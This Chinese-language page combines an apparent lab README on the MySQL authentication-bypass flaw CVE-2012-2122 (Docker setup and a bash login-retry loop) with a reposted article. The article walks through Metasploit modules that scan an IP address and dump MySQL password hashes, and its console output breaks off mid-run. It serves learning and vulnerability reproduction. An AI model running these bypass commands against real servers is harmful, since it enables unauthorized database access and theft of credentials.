Mysql 身份認證繞過漏洞(CVE-2012-2122)
當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL數據庫。
受影響版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
參考鏈接:
- http://www.freebuf.com/vuls/3815.html
- https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/
環境搭建
經過測試,本環境雖然運行在容器內部,但漏洞是否能夠復現仍然與宿主機有一定關系。宿主機最好選擇Ubuntu或Mac系統,但也不知道是否一定能夠成功,歡迎在Issue中提交更多測試結果。
執行如下命令啟動測試環境:
docker-compose up -d環境啟動后,將啟動一個Mysql服務(版本:5.5.23),監聽3306端口,通過正常的Mysql客戶端,可以直接登錄的,正確root密碼是123456。
漏洞驗證
在不知道我們環境正確密碼的情況下,在bash下運行如下命令,在一定數量嘗試后便可成功登錄:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
更多測試和利用方法,見參考鏈接。
用Metasploit破解Mysql用戶名和密碼
發表於:2016-1-11 13:47 作者:alexkn 來源:51Testing軟件測試網采編
字體:大 中 小 | 上一篇 | 下一篇 |我要投稿 | 推薦標簽:
假設我們得到了一個Mysql為5.1.61, 5.2.11, 5.3.5, 5.5.22的數據庫(下面這個只是操作過程,數據庫版本不是含漏洞版本)
|
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS 5
THREADS => 5
msf auxiliary(mysql_version) > exploit
[*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
第一步就是獲取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事實上有IP足夠了,所有端口開放的服務都能掃描得到)
|
msf auxiliary(mysql_hashdump) > search CVE-2012-2122
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump
msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit
[+] 10.199.128.61:3306 The server allows logins, proceeding with bypass test
[*] 10.199.128.61:3306 Authentication bypass is 10% complete
[*] 10.199.128.61:3306 Authentication bypass is 20% complete
[*] 10.199.128.61:3306 Authentication bypass is 30% complete
[*] 10.199.128.61:3306 Authentication bypass is 40% complete
[*] 10.199.128.61:3306 Authentication bypass is 50% complete
[*] 10.199.128.61:3306 Authentication bypass is 60% complete
[*] 10.199.128.61:3306 Authentication bypass is 70% complete
效果圖:
|